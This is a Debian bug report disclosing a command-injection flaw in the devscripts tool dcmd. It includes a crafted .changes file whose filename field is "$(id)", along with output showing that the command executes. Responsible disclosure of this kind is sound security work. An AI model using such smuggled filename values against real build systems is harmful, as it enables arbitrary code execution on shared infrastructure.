Package: devscripts
Version: 2.26.9
Severity: critical
File: /usr/bin/dcmd
hello!
When I read through #1138907 the error message caught my attention and I crafted
a .changes file that executes arbitrary code when processed:
--- 8< ---
Format: 1.8
Files:
ffffffffffffffffffffffffffffffff 1337 abc optional "$(id)"
--- >8 ---
$ /usr/bin/dcmd echo hax.changes
uid=1000(user) gid=1000(user) groups=1000(user),27(sudo),112(sbuild) hax.changes
This creates an undocumented execution path that may cross security boundaries
on Debian build server infrastructure.
This bug is related to #1138923.
Sincerely,
kpcyrd
